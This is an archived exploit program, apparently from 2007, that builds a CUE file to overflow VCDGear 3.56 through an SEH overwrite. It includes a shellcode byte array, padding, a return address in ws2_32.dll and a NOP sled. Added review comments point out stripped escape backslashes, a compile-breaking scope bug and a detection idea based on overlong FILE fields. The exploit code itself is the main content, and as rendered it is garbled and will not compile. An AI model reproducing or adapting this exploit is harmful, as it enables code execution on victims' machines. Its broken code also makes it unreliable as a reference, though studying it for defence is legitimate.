# Title : VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit
# Published : 2007-04-13
# Author : InTeL
/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Author: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:
"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG,
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow
different machines to process and generate output that is compatible between one another."
Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]
Greetz: erazerz, m03, devcode, #pen15
*/
#include <stdlib.h>
#include <stdio.h>
// Exec Calc.exe Scode
// Payload byte array that main() copies verbatim into the FILE field of the
// generated CUE sheet.
// NOTE(review): in this rendering every "\x" escape has lost its backslash,
// so the literal as shown is a plain-ASCII string, not the byte sequence the
// header comment describes. The "Exec Calc.exe" label above is the author's
// claim and cannot be verified from the text shown here.
// main() emits this with fputs(), so only the bytes up to the first NUL are
// ever written.
unsigned char scode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42"
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a"
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c"
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57"
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50"
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d"
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f"
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a"
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76"
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65"
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78"
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f"
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65"
"x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d"
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31"
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69"
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61"
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70"
"x63x51x71x32x4cx52x43x37x70x42";
/*
 * Entry point: writes a CUE sheet to argv[1] whose FILE field is an
 * oversized string (324 bytes of filler, the 8 bytes the header comment
 * calls the SEH overwrite, a run of filler bytes, then scode), followed by
 * an ordinary TRACK/INDEX pair.
 *
 * Returns 0 on every path, including the usage message and the fopen()
 * failure, so a caller cannot distinguish success from failure by exit
 * status.
 *
 * Detection note: a CUE sheet whose FILE path runs to thousands of bytes is
 * unlikely in legitimately produced sheets; a content rule keyed on an
 * overlong FILE field would flag files produced by this program.
 */
int main(int argc, char *argv[])
{
FILE *handle;
if(argc < 2) {
// NOTE(review): the "\n" escapes throughout this file appear with the
// backslash stripped, so "exploitn" is printed literally.
printf("0day VCDGear exploitn");
printf("Usage: %s <output CUE file>", argv[0]);
return 0;
}
// Text-mode open; the failure is reported but the process still exits 0.
if(!(handle = fopen(argv[1], "w"))) {
printf("[+] Error");
return 0;
}
// Opening quote of the CUE FILE field. As rendered, the escaped quote has
// lost its backslash, so this is "FILE " concatenated with an empty literal.
fputs("FILE "", handle);
// 324 filler bytes -- the "Junk" figure from the header comment.
for (int i=0;i<324;i++)
fputs("A", handle);
// The 8 bytes the header comment labels the SEH overwrite; the second four
// are the address described in the trailing comment on the next line.
fputs("xebx32x90x90", handle);
fputs("x3ax1fx03x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 5.0.2195.6601)
// BUG: `i` was declared in the for-init above (C99 block scope) and is not
// visible here, so this line does not compile; it needs its own `int i`.
for (i=0;i<200;i++)
fputs("x90", handle);
// fputs() stops at the first NUL byte, so only the NUL-free prefix of scode
// is written.
fputs((char *)scode, handle);
// Closing quote and file type. NOTE(review): as rendered the escaped quote
// is missing, leaving `"" BINARYn"` which is not a valid C token sequence.
fputs("" BINARYn", handle);
// A conventional TRACK/INDEX pair so the sheet still parses as a CUE file.
fputs(" TRACK 01 MODE2/2352n", handle);
fputs(" INDEX 01 00:00:00n", handle);
// fclose() return value is not checked, so a short write goes unnoticed.
fclose(handle);
printf("[+] File successfully created");
return 0;
}